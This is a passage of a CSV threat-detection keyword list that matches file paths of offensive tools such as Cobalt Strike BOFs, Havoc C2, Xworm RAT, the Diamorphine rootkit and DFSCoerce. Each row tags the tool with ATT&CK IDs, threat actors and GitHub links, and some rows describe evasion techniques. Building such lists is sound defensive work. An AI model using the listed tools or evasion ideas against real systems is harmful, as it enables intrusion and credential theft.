- Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/defender-exclusions/*exclusion*",".{0,1000}\/defender\-exclusions\/.{0,1000}exclusion.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/Defense_Evasion.sh*",".{0,1000}\/Defense_Evasion\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/DelegationBOF/*",".{0,1000}\/DelegationBOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*/DelegationBOF/*",".{0,1000}\/DelegationBOF\/.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*/DeleteWD.dll*",".{0,1000}\/DeleteWD\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/deluge-rpc-brute.nse*",".{0,1000}\/deluge\-rpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dementor.py*",".{0,1000}\/dementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*/demiguise.py*",".{0,1000}\/demiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*/demo_bof.c*",".{0,1000}\/demo_bof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/demon.x64.bin*",".{0,1000}\/demon\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/demon.x64.exe*",".{0,1000}\/demon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/demon1.dll*",".{0,1000}\/demon1\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/demosyscalls.exe*",".{0,1000}\/demosyscalls\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Dendrobate.git*",".{0,1000}\/Dendrobate\.git.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.bin*",".{0,1000}\/Dendron\.bin.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.csproj*",".{0,1000}\/Dendron\.csproj.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.exe*",".{0,1000}\/Dendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.sln*",".{0,1000}\/Dendron\.sln.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/DeNiSe.git*",".{0,1000}\/DeNiSe\.git.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*/Dent/*/Loader/Loader.go*",".{0,1000}\/Dent\/.{0,1000}\/Loader\/Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/Dent/Dent.go*",".{0,1000}\/Dent\/Dent\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/Dent/Loader*",".{0,1000}\/Dent\/Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/DeployPrinterNightmare.exe*",".{0,1000}\/DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/DesertFox/archive/*.zip*",".{0,1000}\/DesertFox\/archive\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*/detail/kali-linux/*",".{0,1000}\/detail\/kali\-linux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/detect_antivirus/*.js*",".{0,1000}\/detect_antivirus\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/detect_antivirus/*.rb*",".{0,1000}\/detect_antivirus\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/detect-hooks.c*",".{0,1000}\/detect\-hooks\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/detect-hooks.cna*",".{0,1000}\/detect\-hooks\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/detect-hooks.h*",".{0,1000}\/detect\-hooks\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/Detect-Hooks/*",".{0,1000}\/Detect\-Hooks\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/DFSCoerce.git*",".{0,1000}\/DFSCoerce\.git.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","687","90","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*/dfscoerce.py*",".{0,1000}\/dfscoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/dhcp-discover.nse*",".{0,1000}\/dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dhcpd-noroute.conf*",".{0,1000}\/dhcpd\-noroute\.conf.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*/Dialogs/Payload.hpp*",".{0,1000}\/Dialogs\/Payload\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Diamorphine.git*",".{0,1000}\/Diamorphine\.git.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*/dicassassin.7z*",".{0,1000}\/dicassassin\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/dicom-brute.nse*",".{0,1000}\/dicom\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - 